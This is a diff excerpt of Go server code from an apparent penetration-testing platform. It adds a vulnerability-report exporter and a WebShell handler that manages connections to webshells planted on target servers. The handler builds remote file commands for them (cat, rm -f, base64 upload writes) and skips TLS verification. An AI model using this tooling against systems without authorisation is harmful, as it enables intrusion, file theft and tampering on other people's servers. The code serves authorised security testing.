||||
c.JSON(http.StatusOK, gin.H{"message": "批量删除成功", "deleted": deleted})
|
||||
}
|
||||
|
||||
// GetVulnerabilityStats 获取漏洞统计
|
||||
func (h *VulnerabilityHandler) GetVulnerabilityStats(c *gin.Context) {
|
||||
filter := parseVulnerabilityListFilter(c)
|
||||
|
||||
stats, err := h.db.GetVulnerabilityStats(filter)
|
||||
if err != nil {
|
||||
h.logger.Error("获取漏洞统计失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, stats)
|
||||
}
|
||||
|
||||
// GetVulnerabilityFilterOptions 获取漏洞筛选建议项
|
||||
func (h *VulnerabilityHandler) GetVulnerabilityFilterOptions(c *gin.Context) {
|
||||
options, err := h.db.GetVulnerabilityFilterOptions()
|
||||
if err != nil {
|
||||
h.logger.Error("获取漏洞筛选建议失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, options)
|
||||
}
|
||||
|
||||
// ExportVulnerabilities 导出漏洞(支持按对话/任务分组,汇总或拆分)
|
||||
func (h *VulnerabilityHandler) ExportVulnerabilities(c *gin.Context) {
|
||||
groupBy := c.DefaultQuery("group_by", "conversation")
|
||||
mode := c.DefaultQuery("mode", "summary")
|
||||
if groupBy != "conversation" && groupBy != "task" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "group_by 仅支持 conversation 或 task"})
|
||||
return
|
||||
}
|
||||
if mode != "summary" && mode != "split" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "mode 仅支持 summary 或 split"})
|
||||
return
|
||||
}
|
||||
|
||||
filter := parseVulnerabilityListFilter(c)
|
||||
|
||||
total, err := h.db.CountVulnerabilities(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if total == 0 {
|
||||
c.JSON(http.StatusOK, gin.H{"mode": mode, "group_by": groupBy, "total": 0, "files": []any{}})
|
||||
return
|
||||
}
|
||||
|
||||
items, err := h.db.ListVulnerabilities(total, 0, filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
type exportFile struct {
|
||||
FileName string `json:"filename"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
grouped := map[string][]*database.Vulnerability{}
|
||||
for _, v := range items {
|
||||
key := v.ConversationID
|
||||
if groupBy == "conversation" {
|
||||
if strings.TrimSpace(v.ConversationTag) != "" {
|
||||
key = strings.TrimSpace(v.ConversationTag)
|
||||
}
|
||||
} else {
|
||||
key = firstNonEmpty(v.TaskTag, v.TaskID, v.TaskQueueID, "unassigned-task")
|
||||
}
|
||||
grouped[key] = append(grouped[key], v)
|
||||
}
|
||||
|
||||
files := make([]exportFile, 0)
|
||||
nowStr := time.Now().Format("20060102-150405")
|
||||
if mode == "summary" {
|
||||
var b strings.Builder
|
||||
b.WriteString("# 漏洞批量导出报告\n\n")
|
||||
b.WriteString(fmt.Sprintf("- 导出时间: %s\n", time.Now().Format("2006-01-02 15:04:05")))
|
||||
b.WriteString(fmt.Sprintf("- 分组维度: %s\n", groupBy))
|
||||
b.WriteString(fmt.Sprintf("- 漏洞总数: %d\n", len(items)))
|
||||
b.WriteString(fmt.Sprintf("- 分组数: %d\n\n", len(grouped)))
|
||||
for group, list := range grouped {
|
||||
b.WriteString(fmt.Sprintf("## %s (%d)\n\n", group, len(list)))
|
||||
for _, v := range list {
|
||||
appendVulnerabilityMarkdown(&b, v, "###")
|
||||
}
|
||||
}
|
||||
files = append(files, exportFile{
|
||||
FileName: fmt.Sprintf("vulnerability-report-%s-%s.md", groupBy, nowStr),
|
||||
Content: b.String(),
|
||||
})
|
||||
} else {
|
||||
for group, list := range grouped {
|
||||
var b strings.Builder
|
||||
b.WriteString(fmt.Sprintf("# 漏洞报告 - %s\n\n", group))
|
||||
b.WriteString(fmt.Sprintf("- 导出时间: %s\n", time.Now().Format("2006-01-02 15:04:05")))
|
||||
b.WriteString(fmt.Sprintf("- 漏洞数量: %d\n\n", len(list)))
|
||||
for _, v := range list {
|
||||
appendVulnerabilityMarkdown(&b, v, "##")
|
||||
}
|
||||
files = append(files, exportFile{
|
||||
FileName: fmt.Sprintf("vulnerability-%s-%s.md", sanitizeExportName(group), nowStr),
|
||||
Content: b.String(),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"mode": mode,
|
||||
"group_by": groupBy,
|
||||
"total": len(items),
|
||||
"files": files,
|
||||
})
|
||||
}
|
||||
|
||||
// appendVulnerabilityMarkdown 单条漏洞的 Markdown 片段(与单文件下载字段对齐,缺省字段不写)
|
||||
func appendVulnerabilityMarkdown(b *strings.Builder, v *database.Vulnerability, titleHeading string) {
|
||||
b.WriteString(fmt.Sprintf("%s %s\n\n", titleHeading, v.Title))
|
||||
b.WriteString(fmt.Sprintf("- 漏洞ID: `%s`\n", v.ID))
|
||||
b.WriteString(fmt.Sprintf("- 严重程度: %s\n", v.Severity))
|
||||
b.WriteString(fmt.Sprintf("- 状态: %s\n", v.Status))
|
||||
if v.Type != "" {
|
||||
b.WriteString(fmt.Sprintf("- 类型: %s\n", v.Type))
|
||||
}
|
||||
if v.Target != "" {
|
||||
b.WriteString(fmt.Sprintf("- 目标: %s\n", v.Target))
|
||||
}
|
||||
b.WriteString(fmt.Sprintf("- 对话ID: `%s`\n", v.ConversationID))
|
||||
if v.ConversationTag != "" {
|
||||
b.WriteString(fmt.Sprintf("- 对话标签: %s\n", v.ConversationTag))
|
||||
}
|
||||
if v.TaskTag != "" {
|
||||
b.WriteString(fmt.Sprintf("- 任务标签: %s\n", v.TaskTag))
|
||||
}
|
||||
if v.TaskID != "" {
|
||||
b.WriteString(fmt.Sprintf("- 任务ID: `%s`\n", v.TaskID))
|
||||
}
|
||||
if v.TaskQueueID != "" {
|
||||
b.WriteString(fmt.Sprintf("- 任务队列ID: `%s`\n", v.TaskQueueID))
|
||||
}
|
||||
if !v.CreatedAt.IsZero() {
|
||||
b.WriteString(fmt.Sprintf("- 创建时间: %s\n", v.CreatedAt.Format("2006-01-02 15:04:05")))
|
||||
}
|
||||
if !v.UpdatedAt.IsZero() {
|
||||
b.WriteString(fmt.Sprintf("- 更新时间: %s\n", v.UpdatedAt.Format("2006-01-02 15:04:05")))
|
||||
}
|
||||
if v.Description != "" {
|
||||
b.WriteString("\n#### 描述\n\n")
|
||||
b.WriteString(v.Description)
|
||||
b.WriteString("\n")
|
||||
}
|
||||
if v.Proof != "" {
|
||||
b.WriteString("\n#### 证明(POC)\n\n```\n")
|
||||
b.WriteString(v.Proof)
|
||||
b.WriteString("\n```\n")
|
||||
}
|
||||
if v.Impact != "" {
|
||||
b.WriteString("\n#### 影响\n\n")
|
||||
b.WriteString(v.Impact)
|
||||
b.WriteString("\n")
|
||||
}
|
||||
if v.Recommendation != "" {
|
||||
b.WriteString("\n#### 修复建议\n\n")
|
||||
b.WriteString(v.Recommendation)
|
||||
b.WriteString("\n")
|
||||
}
|
||||
b.WriteString("\n")
|
||||
}
|
||||
|
||||
func firstNonEmpty(values ...string) string {
|
||||
for _, v := range values {
|
||||
trimmed := strings.TrimSpace(v)
|
||||
if trimmed != "" {
|
||||
return trimmed
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func sanitizeExportName(raw string) string {
|
||||
name := strings.TrimSpace(raw)
|
||||
if name == "" {
|
||||
return "unknown"
|
||||
}
|
||||
replacer := strings.NewReplacer("/", "-", "\\", "-", ":", "-", "*", "-", "?", "-", "\"", "-", "<", "-", ">", "-", "|", "-")
|
||||
return replacer.Replace(name)
|
||||
}
|
||||
@@ -0,0 +1,993 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/tls"
|
||||
"database/sql"
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/text/encoding/simplifiedchinese"
|
||||
"golang.org/x/text/transform"
|
||||
)
|
||||
|
||||
// webshellSupportedEncodings 允许的 WebShell 响应编码取值(小写,含空串代表 auto)
|
||||
// 仅暴露目前最常见的几种,其他需求可后续扩展(如 Big5、Shift_JIS 等)。
|
||||
var webshellSupportedEncodings = map[string]struct{}{
|
||||
"": {}, // 未配置,按 auto 处理
|
||||
"auto": {},
|
||||
"utf-8": {},
|
||||
"utf8": {},
|
||||
"gbk": {},
|
||||
"gb18030": {},
|
||||
}
|
||||
|
||||
// normalizeWebshellEncoding 归一化编码标识:统一为小写,未知值回退为 auto,供持久化使用
|
||||
func normalizeWebshellEncoding(enc string) string {
|
||||
enc = strings.ToLower(strings.TrimSpace(enc))
|
||||
if _, ok := webshellSupportedEncodings[enc]; !ok {
|
||||
return "auto"
|
||||
}
|
||||
if enc == "" {
|
||||
return "auto"
|
||||
}
|
||||
if enc == "utf8" {
|
||||
return "utf-8"
|
||||
}
|
||||
return enc
|
||||
}
|
||||
|
||||
// decodeWebshellOutput 把 WebShell 返回的字节按指定编码转换为合法 UTF-8 字符串。
|
||||
// 约定:
|
||||
// - "" / "auto":若已是合法 UTF-8 原样返回,否则依次尝试 GB18030(GBK 超集)解码。
|
||||
// - "utf-8" / "utf8":原样返回,非法字节交由 JSON 层按 U+FFFD 处理(保持原有行为)。
|
||||
// - "gbk" / "gb18030":强制按对应编码解码;失败则回退原始字节。
|
||||
//
|
||||
// 该函数对空输入直接返回空串,避免不必要的转换。
|
||||
func decodeWebshellOutput(raw []byte, encoding string) string {
|
||||
if len(raw) == 0 {
|
||||
return ""
|
||||
}
|
||||
enc := normalizeWebshellEncoding(encoding)
|
||||
switch enc {
|
||||
case "utf-8":
|
||||
return string(raw)
|
||||
case "gbk":
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GBK.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
case "gb18030":
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
default: // auto
|
||||
if utf8.Valid(raw) {
|
||||
return string(raw)
|
||||
}
|
||||
// GB18030 是 GBK 的超集,覆盖范围最广,auto 模式统一用它兜底
|
||||
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||
return string(out)
|
||||
}
|
||||
return string(raw)
|
||||
}
|
||||
}
|
||||
|
||||
// webshellSupportedOS 允许的 WebShell 目标操作系统(小写,空串代表 auto)
|
||||
var webshellSupportedOS = map[string]struct{}{
|
||||
"": {},
|
||||
"auto": {},
|
||||
"linux": {},
|
||||
"windows": {},
|
||||
}
|
||||
|
||||
// normalizeWebshellOS 归一化 OS 标识,未知值回退为 auto,供持久化使用
|
||||
func normalizeWebshellOS(osTag string) string {
|
||||
osTag = strings.ToLower(strings.TrimSpace(osTag))
|
||||
if _, ok := webshellSupportedOS[osTag]; !ok {
|
||||
return "auto"
|
||||
}
|
||||
if osTag == "" {
|
||||
return "auto"
|
||||
}
|
||||
return osTag
|
||||
}
|
||||
|
||||
// resolveWebshellOS 根据连接的 os 与 shellType 推断最终目标 OS(仅返回 "linux" 或 "windows")。
|
||||
// 规则:
|
||||
// - 显式 linux / windows:按用户选择。
|
||||
// - auto 或未知:asp/aspx → windows,其他 → linux。保持历史行为,平滑向后兼容。
|
||||
func resolveWebshellOS(osTag, shellType string) string {
|
||||
osTag = strings.ToLower(strings.TrimSpace(osTag))
|
||||
switch osTag {
|
||||
case "linux":
|
||||
return "linux"
|
||||
case "windows":
|
||||
return "windows"
|
||||
}
|
||||
t := strings.ToLower(strings.TrimSpace(shellType))
|
||||
if t == "asp" || t == "aspx" {
|
||||
return "windows"
|
||||
}
|
||||
return "linux"
|
||||
}
|
||||
|
||||
// quoteCmdPath 把路径按 Windows cmd.exe 规则转义。
|
||||
// 使用双引号包裹,内部双引号转义为 ""(cmd 接受的写法)。
|
||||
func quoteCmdPath(p string) string {
|
||||
if p == "" {
|
||||
return "\".\""
|
||||
}
|
||||
return "\"" + strings.ReplaceAll(p, "\"", "\"\"") + "\""
|
||||
}
|
||||
|
||||
// normalizeWindowsCmdPath 把前端统一的 "/" 路径转换为 cmd 更稳定识别的 "\"。
|
||||
// 仅用于 Windows 命令构造,不改变语义(例如 "." / ".." 会保持不变)。
|
||||
func normalizeWindowsCmdPath(p string) string {
|
||||
s := strings.TrimSpace(p)
|
||||
if s == "" {
|
||||
return s
|
||||
}
|
||||
return strings.ReplaceAll(s, "/", "\\")
|
||||
}
|
||||
|
||||
// quotePsSingle 把字符串按 PowerShell 单引号字符串规则转义(内部 ' → '')。
|
||||
// 供 PowerShell 脚本参数使用,全脚本只用单引号,外层 cmd 再用双引号包裹即可安全传递。
|
||||
func quotePsSingle(s string) string {
|
||||
return "'" + strings.ReplaceAll(s, "'", "''") + "'"
|
||||
}
|
||||
|
||||
// quoteShellSinglePosix 把路径按 POSIX sh 单引号规则转义(内部 ' → '\'')
|
||||
func quoteShellSinglePosix(p string) string {
|
||||
if p == "" {
|
||||
return "."
|
||||
}
|
||||
return "'" + strings.ReplaceAll(p, "'", "'\\''") + "'"
|
||||
}
|
||||
|
||||
// quoteWebshellPath 按目标 OS 选择转义方案:Linux 用 POSIX 单引号,Windows 用 cmd 双引号
|
||||
func quoteWebshellPath(path, osTag string) string {
|
||||
if resolveWebshellOS(osTag, "") == "windows" {
|
||||
return quoteCmdPath(path)
|
||||
}
|
||||
return quoteShellSinglePosix(path)
|
||||
}
|
||||
|
||||
// buildWindowsPowerShellWrite 构造 Windows 端把 base64 内容一次性写入目标路径的 cmd 命令。
|
||||
// 外层走 cmd.exe 的 powershell 调用,PowerShell 脚本里只用单引号字符串,避免嵌套引号陷阱。
|
||||
func buildWindowsPowerShellWrite(path, b64 string) string {
|
||||
script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" +
|
||||
"[IO.File]::WriteAllBytes(" + quotePsSingle(path) + ",$b)"
|
||||
return "powershell -NoProfile -NonInteractive -Command \"" + script + "\""
|
||||
}
|
||||
|
||||
// buildWindowsPowerShellAppend 构造 Windows 端把 base64 内容追加写入目标路径的 cmd 命令(用于分块上传)
|
||||
func buildWindowsPowerShellAppend(path, b64 string) string {
|
||||
script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" +
|
||||
"$f=[IO.File]::Open(" + quotePsSingle(path) + ",[IO.FileMode]::Append,[IO.FileAccess]::Write,[IO.FileShare]::None);" +
|
||||
"try{$f.Write($b,0,$b.Length)}finally{$f.Close()}"
|
||||
return "powershell -NoProfile -NonInteractive -Command \"" + script + "\""
|
||||
}
|
||||
|
||||
// fileCommandInput 封装 buildFileCommand 的输入,避免长参数列表
|
||||
type fileCommandInput struct {
|
||||
Action string
|
||||
Path string
|
||||
TargetPath string
|
||||
Content string
|
||||
ChunkIndex int
|
||||
OS string
|
||||
ShellType string
|
||||
}
|
||||
|
||||
// buildFileCommand 根据目标 OS 与文件操作类型生成具体的远端命令字符串。
|
||||
// 同一份实现供 HTTP 入口(FileOp)与 MCP 入口(FileOpWithConnection)共用,避免双份维护。
|
||||
// 返回值第二位是用户可见的业务错误(如 "path is required")。
|
||||
func (h *WebShellHandler) buildFileCommand(in fileCommandInput) (string, error) {
|
||||
targetOS := resolveWebshellOS(in.OS, in.ShellType)
|
||||
action := strings.ToLower(strings.TrimSpace(in.Action))
|
||||
path := strings.TrimSpace(in.Path)
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
p := path
|
||||
if p == "" {
|
||||
p = "."
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
p = normalizeWindowsCmdPath(p)
|
||||
return "dir /a " + quoteCmdPath(p), nil
|
||||
}
|
||||
return "ls -la " + quoteShellSinglePosix(p), nil
|
||||
|
||||
case "read":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
return "type " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "cat " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "delete":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
return "del /q /f " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "rm -f " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "mkdir":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
// cmd 的 md 默认会自动创建中间目录(等价于 Linux 的 mkdir -p)
|
||||
return "md " + quoteCmdPath(path), nil
|
||||
}
|
||||
return "mkdir -p " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "rename":
|
||||
oldPath := path
|
||||
newPath := strings.TrimSpace(in.TargetPath)
|
||||
if oldPath == "" || newPath == "" {
|
||||
return "", errFileOpRenameNeedsBothPaths
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
oldPath = normalizeWindowsCmdPath(oldPath)
|
||||
newPath = normalizeWindowsCmdPath(newPath)
|
||||
return "move /y " + quoteCmdPath(oldPath) + " " + quoteCmdPath(newPath), nil
|
||||
}
|
||||
return "mv -f " + quoteShellSinglePosix(oldPath) + " " + quoteShellSinglePosix(newPath), nil
|
||||
|
||||
case "write":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
// 统一策略:先把内容 base64 编码,再用目标平台对应方式解码写回,
|
||||
// 这样既能写入任意二进制/含引号的文本,又避免各家 shell 的转义地狱。
|
||||
b64 := base64.StdEncoding.EncodeToString([]byte(in.Content))
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
return buildWindowsPowerShellWrite(path, b64), nil
|
||||
}
|
||||
return "echo '" + b64 + "' | base64 -d > " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "upload":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if len(in.Content) > 512*1024 {
|
||||
return "", errFileOpUploadTooLarge
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
return buildWindowsPowerShellWrite(path, in.Content), nil
|
||||
}
|
||||
return "echo '" + in.Content + "' | base64 -d > " + quoteShellSinglePosix(path), nil
|
||||
|
||||
case "upload_chunk":
|
||||
if path == "" {
|
||||
return "", errFileOpPathRequired
|
||||
}
|
||||
if targetOS == "windows" {
|
||||
path = normalizeWindowsCmdPath(path)
|
||||
if in.ChunkIndex == 0 {
|
||||
return buildWindowsPowerShellWrite(path, in.Content), nil
|
||||
}
|
||||
return buildWindowsPowerShellAppend(path, in.Content), nil
|
||||
}
|
||||
redir := ">>"
|
||||
if in.ChunkIndex == 0 {
|
||||
redir = ">"
|
||||
}
|
||||
return "echo '" + in.Content + "' | base64 -d " + redir + " " + quoteShellSinglePosix(path), nil
|
||||
}
|
||||
|
||||
return "", errFileOpUnsupportedAction(action)
|
||||
}
|
||||
|
||||
// 业务错误常量,便于上层统一返回用户可见提示
|
||||
var (
|
||||
errFileOpPathRequired = simpleError("path is required")
|
||||
errFileOpRenameNeedsBothPaths = simpleError("path and target_path are required for rename")
|
||||
errFileOpUploadTooLarge = simpleError("upload content too large (max 512KB base64)")
|
||||
)
|
||||
|
||||
func errFileOpUnsupportedAction(action string) error {
|
||||
return simpleError("unsupported action: " + action)
|
||||
}
|
||||
|
||||
// simpleError 是不带堆栈的轻量错误类型,供 buildFileCommand 报可预期的参数校验错误
|
||||
type simpleError string
|
||||
|
||||
func (e simpleError) Error() string { return string(e) }
|
||||
|
||||
// WebShellHandler 代理执行 WebShell 命令(类似冰蝎/蚁剑),避免前端跨域并统一构建请求
|
||||
type WebShellHandler struct {
|
||||
logger *zap.Logger
|
||||
client *http.Client
|
||||
db *database.DB
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *WebShellHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewWebShellHandler 创建 WebShell 处理器,db 可为 nil(连接配置接口将不可用)
|
||||
func NewWebShellHandler(logger *zap.Logger, db *database.DB) *WebShellHandler {
|
||||
return &WebShellHandler{
|
||||
logger: logger,
|
||||
client: &http.Client{
|
||||
Timeout: 30 * time.Second,
|
||||
Transport: &http.Transport{
|
||||
DisableKeepAlives: false,
|
||||
// WebShell 场景常见自签证书或 IP 访问(证书无 IP SAN);默认跳过校验,与蚁剑等客户端一致。
|
||||
TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, //nolint:gosec // intentional for webshell proxy
|
||||
},
|
||||
},
|
||||
db: db,
|
||||
}
|
||||
}
|
||||
|
||||
// CreateConnectionRequest 创建连接请求
|
||||
type CreateConnectionRequest struct {
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"`
|
||||
Method string `json:"method"`
|
||||
CmdParam string `json:"cmd_param"`
|
||||
Remark string `json:"remark"`
|
||||
Encoding string `json:"encoding"`
|
||||
OS string `json:"os"`
|
||||
}
|
||||
|
||||
// UpdateConnectionRequest 更新连接请求
|
||||
type UpdateConnectionRequest struct {
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"`
|
||||
Method string `json:"method"`
|
||||
CmdParam string `json:"cmd_param"`
|
||||
Remark string `json:"remark"`
|
||||
Encoding string `json:"encoding"`
|
||||
OS string `json:"os"`
|
||||
}
|
||||
|
||||
// ListConnections 列出所有 WebShell 连接(GET /api/webshell/connections)
|
||||
func (h *WebShellHandler) ListConnections(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
list, err := h.db.ListWebshellConnections()
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if list == nil {
|
||||
list = []database.WebShellConnection{}
|
||||
}
|
||||
c.JSON(http.StatusOK, list)
|
||||
}
|
||||
|
||||
// CreateConnection 创建 WebShell 连接(POST /api/webshell/connections)
|
||||
func (h *WebShellHandler) CreateConnection(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
var req CreateConnectionRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
req.URL = strings.TrimSpace(req.URL)
|
||||
if req.URL == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "url is required"})
|
||||
return
|
||||
}
|
||||
if _, err := url.Parse(req.URL); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url"})
|
||||
return
|
||||
}
|
||||
method := strings.ToLower(strings.TrimSpace(req.Method))
|
||||
if method != "get" && method != "post" {
|
||||
method = "post"
|
||||
}
|
||||
shellType := strings.ToLower(strings.TrimSpace(req.Type))
|
||||
if shellType == "" {
|
||||
shellType = "php"
|
||||
}
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:12],
|
||||
URL: req.URL,
|
||||
Password: strings.TrimSpace(req.Password),
|
||||
Type: shellType,
|
||||
Method: method,
|
||||
CmdParam: strings.TrimSpace(req.CmdParam),
|
||||
Remark: strings.TrimSpace(req.Remark),
|
||||
Encoding: normalizeWebshellEncoding(req.Encoding),
|
||||
OS: normalizeWebshellOS(req.OS),
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := h.db.CreateWebshellConnection(conn); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
host := req.URL
|
||||
if u, err := url.Parse(req.URL); err == nil {
|
||||
host = u.Host
|
||||
}
|
||||
h.audit.RecordOK(c, "webshell", "connection_create", "创建 WebShell 连接", "webshell_connection", conn.ID, map[string]interface{}{
|
||||
"host": host, "type": shellType,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, conn)
|
||||
}
|
||||
|
||||
// UpdateConnection 更新 WebShell 连接(PUT /api/webshell/connections/:id)
|
||||
func (h *WebShellHandler) UpdateConnection(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
var req UpdateConnectionRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
req.URL = strings.TrimSpace(req.URL)
|
||||
if req.URL == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "url is required"})
|
||||
return
|
||||
}
|
||||
if _, err := url.Parse(req.URL); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url"})
|
||||
return
|
||||
}
|
||||
method := strings.ToLower(strings.TrimSpace(req.Method))
|
||||
if method != "get" && method != "post" {
|
||||
method = "post"
|
||||
}
|
||||
shellType := strings.ToLower(strings.TrimSpace(req.Type))
|
||||
if shellType == "" {
|
||||
shellType = "php"
|
||||
}
|
||||
conn := &database.WebShellConnection{
|
||||
ID: id,
|
||||
URL: req.URL,
|
||||
Password: strings.TrimSpace(req.Password),
|
||||
Type: shellType,
|
||||
Method: method,
|
||||
CmdParam: strings.TrimSpace(req.CmdParam),
|
||||
Remark: strings.TrimSpace(req.Remark),
|
||||
Encoding: normalizeWebshellEncoding(req.Encoding),
|
||||
OS: normalizeWebshellOS(req.OS),
|
||||
}
|
||||
if err := h.db.UpdateWebshellConnection(conn); err != nil {
|
||||
if err == sql.ErrNoRows {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
updated, _ := h.db.GetWebshellConnection(id)
|
||||
if updated != nil {
|
||||
c.JSON(http.StatusOK, updated)
|
||||
} else {
|
||||
c.JSON(http.StatusOK, conn)
|
||||
}
|
||||
}
|
||||
|
||||
// DeleteConnection 删除 WebShell 连接(DELETE /api/webshell/connections/:id)
|
||||
func (h *WebShellHandler) DeleteConnection(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
if err := h.db.DeleteWebshellConnection(id); err != nil {
|
||||
if err == sql.ErrNoRows {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "webshell", "connection_delete", "删除 WebShell 连接", "webshell_connection", id, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
// GetConnectionState 获取 WebShell 连接关联的前端持久化状态(GET /api/webshell/connections/:id/state)
|
||||
func (h *WebShellHandler) GetConnectionState(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
conn, err := h.db.GetWebshellConnection(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if conn == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"})
|
||||
return
|
||||
}
|
||||
stateJSON, err := h.db.GetWebshellConnectionState(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
var state interface{}
|
||||
if err := json.Unmarshal([]byte(stateJSON), &state); err != nil {
|
||||
state = map[string]interface{}{}
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"state": state})
|
||||
}
|
||||
|
||||
// SaveConnectionState 保存 WebShell 连接关联的前端持久化状态(PUT /api/webshell/connections/:id/state)
|
||||
func (h *WebShellHandler) SaveConnectionState(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
